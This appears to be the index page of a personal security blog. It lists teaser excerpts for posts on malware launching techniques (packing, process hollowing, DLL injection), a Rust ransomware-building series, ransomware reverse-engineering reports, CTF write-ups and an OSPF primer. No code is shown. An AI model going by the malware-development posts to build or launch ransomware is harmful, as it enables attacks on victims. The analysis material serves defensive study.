Malware Development
-
Malware Launching - Packing
Malware Development ·Malware Launching - Packing
1. Context
When I first started in malware development, the question I always have in the back of my mind is about how malware can be launched since a lot of AV programs are evolving to detect more and more malicious executable nowadays.
AVs are heavily depedent on the signatures of an executable to...
-
Malware Launching - Process Hollowing
Malware Development ·Malware Launching - Process Hollowing
1. Context
This is another malware launching technique that I have been really interested in learning about. The idea about malware launching is that you have an malicious executable, and you want to execute it like a normal process on your machine.
However, most of the average Windows users are aware of <a...
-
Malware Launching - DLL Injection
Malware Development ·Malware Launching - DLL Injection
1. Context
Ever since I started malware development, I’ve always been interested in the concept of malware launching.
The idea is that malware launcher is an a type of malware that can download/unpack and execute a malware. The goal of the launcher is to set things up so the malicious activity of the...
-
Rust Ransomware (Part 3)
Malware Development ·Rust Ransomware: Part 3
Traversing Windows Directory and Priviledge Escalation
1. Traverse and Encrypt
After having implemented the encrypting algorithm in Part 2, we need to traverse through the victim’s computer’s directories in order to find files to encrypt them.
Typically, directories and files are a bit complicated to process if you want to traverse through...
-
Rust Ransomware (Part 2)
Malware Development ·Rust Ransomware: Part 2
Crypto and How Ransomwares encrypt your file
1. Ransomware and Encryption
A typical ransomware is just a malicious program that encrypts your files with some method, making them unusable, and hold it for ransom.
If the victim wants the files back, they have to pay and have the malware author to decrypt the...
-
Rust Ransomware (Part 1)
Malware Development ·Rust Ransomware | Part 1
Setting up & Implementing Anti-Rerversing techniques in malwares
Set up
- To set up this lab, please make sure you have a recent version of Rust installed.
- Create a folder on your computer and change into that directory from your Command Prompt
<pre...
Reverse Engineering
-
PLAY Ransomware
Reverse Engineering ·PLAY Ransomware
Contents
-
LockBit Ransomware v2.0
Reverse Engineering ·LockBit Ransomware v2.0
-
Rook Ransomware
Reverse Engineering ·Rook Ransomware
Contents
-
Diavol Ransomware
Reverse Engineering ·Diavol Ransomware
Contents
-
AtomSilo Ransomware
Reverse Engineering ·AtomSilo Ransomware
Contents
-
BlackMatter Ransomware v2.0
Reverse Engineering ·BlackMatter Ransomware v2.0
Contents
-
MountLocker Ransomware
Reverse Engineering ·MountLocker Ransomware
Overview
This is my report for a MountLocker Ransomware v5.0 sample, which is used by XingLocker ransomware group.
This ransomware uses a hybrid-cryptography scheme of RSA-2048 and ChaCha20 to encrypt files and protect its keys. Unlike other ransomware, MountLocker encrypts all of the ChaCha20 keys with a global ChaCha20 key before encrypting this global key with...
-
Darkside Ransomware
Reverse Engineering ·Darkside Ransomware
Overview
This is my report for one of the latest Windows samples of Darkside Ransomware v1.8.6.2!
Since there is not a lot of in-depth analysis on Darkside out there, I decided to just write one myself.
Darkside uses aPLib algorithm to compress its configuration and a hybrid-cryptography scheme of custom RSA-1024 and Salsa20 to encrypt files...
-
Babuk Ransomware v3
Reverse Engineering ·Babuk Ransomware v3
Overview
This is a short report for the latest Babuk ransomware sample. This sample is marked as version 3 based on the run-once mutex string.
For this new version, the malware author keeps most of the old functionalities the same except for the encryption scheme and the multithreading approach.
Since I have covered Babuk old...
-
Babuk Ransomware
Reverse Engineering ·Babuk Ransomware
Overview
This is my report for the new Babuk Ransomware that recently appears at the beginning of 2021.
Since this is the first detection of this malware in the wild, it’s not surprising that Babuk is not obsfuscated at all. Overall, it’s a pretty standard ransomware that utilizes some of the new techniques we see such...
-
Conti Ransomware
Reverse Engineering ·Conti Ransomware v2
Overview
This is my full analysis for the Conti Ransomware version 2. Over the last few months, I have seen quite a few companies getting hit by this ransomware, so it’s been interesting analyzing and figuring how it works.
As one of the newer ransomware families, Conti utilizes multi-threading features on Windows to encrypt files...
-
RegretLocker
Reverse Engineering ·RegretLocker
Summary
RegretLocker is a new ransomware that has been found in the wild in the last month that does not only encrypt normal files on disk like other ransomwares. When running, it will particularly search for VHD files, mount them using Windows Virtual Storage API, and then encrypt all the files it finds inside of those VHD...
-
Zero2Automated Custom Sample
Reverse Engineering ·Zero2Automated Custom Sample Full Anlysis
1. Context
I have been super bored after Flare-On 7 ended, and I’m too lazy to finish the rest of the writeups for it… As a result, I ended up signing up for Zero2Automated by Vitali Kremez and 0verfl0w to keep myself busy while sharpening my malware analysis skills!
This...
-
Flare-On 7 - Challenge 2
Reverse Engineering ·After unzipping the challenge, we get a single Windows executable. This is the prompt given by the author.
One of our team members developed a Flare-On challenge but accidentally deleted it. We recovered it using extreme digital forensic techniques but it seems to be corrupted. We would fix it but we are too busy solving today's... -
Flare-On 7 - Challenge 1
Reverse Engineering ·Rust Ransomware | Challenge 1
After unzipping the challenge, we get 2 Python files, an EXE file, and some folder containing images used by the game. This prompt is given by the challenge’s author.
Welcome to the Seventh Flare-On Challenge! This is a simple game. Win it by any means necessary and the victory screen... -
Reversing.kr - Ransomware
Reverse Engineering ·Reversing.kr - Ransomware
1. Context
This is the fourth post of my reversing series following the previous posts about Reversing.kr.
This time, the challenge is Ransomware. From this name, I guess we will be dealing with encrypted files!
2. Ransomware
First, when we unzip the zip file, we get 2 files, file and ransomware.exe.
Since there...
-
Reversing.kr - Replace
Reverse Engineering ·Reversing.kr - Replace
1. Context
This is the third post of my reversing series following the previous posts about Reversing.kr.
This time, I’ll be working on the next challenge, Replace. I got 0 context from this name, so I actually can’t guess the functionality of this executable before trying static analysis.
2. Replace
First, like always,...
-
Reversing.kr - Easy Keygen
Reverse Engineering ·Reversing.kr - Easy Keygen
1. Context
This is the next post of my reversing series following the previous post about Reversing.kr here.
This time, I’ll be working on the next challenge, Easy Keygen. Like the name implies, this type of challenge is for us to be able to reverse a key generation for a specific value...
-
Reversing.kr - Easy Crack
Reverse Engineering ·Reversing.kr - Easy Crack
1. Context
I’ve been working at Union Pacific for the network design team, so I have not had much practice with reverse engineering lately.
Since FLARE-On 2020 from FireEye is coming next weekend, I figure that I should do some reversing this weekend to prepare for it.
I have picked Reversing.kr to...
-
PE Parser
Reverse Engineering ·PE File Parser
1. Context
I have been doing a lot of malware analysis recently, but I realize I do not know much about the entire structure of a PE file. It has really been annoying having to look up what each component is and where they are in memory everytime I need them.
I have already implemented...
-
CSCML2020 CTF Write-up
Reverse Engineering ·CSCML2020 Reverse Engineering Write-up
1. TimeTravel
This task’s prompt was about time travelling, so I first assumed that it has to deal with time manipulation inside the executable.
When I first ran the executable, this is what I get. Seems like we are just going through these dialogs forever, and nothing is...
-
How I "hacked" my way through a CS homework
Reverse Engineering ·How I “hacked” my way through a CS homework
1. Context
I’m currently taking a Computer Science course at Georgia Tech called CS 2110 - Computer Organization and Programming. I have taken the exact same course from the ECE department, but since I changed my major, those classes don’t count toward my credit…
And here we are, grinding...
Network Engineering
-
Open Shortest Path First
Network Engineering ·Open Shortest Path First - Routing Protocol
1. Context
I’m starting my network engineering internship with Union Pacific soon in a week, and my managers have been asking me to review networking concepts that the company frequently uses.
One of the important ones is OSPF as, I think, it is our main link state routing protocol within...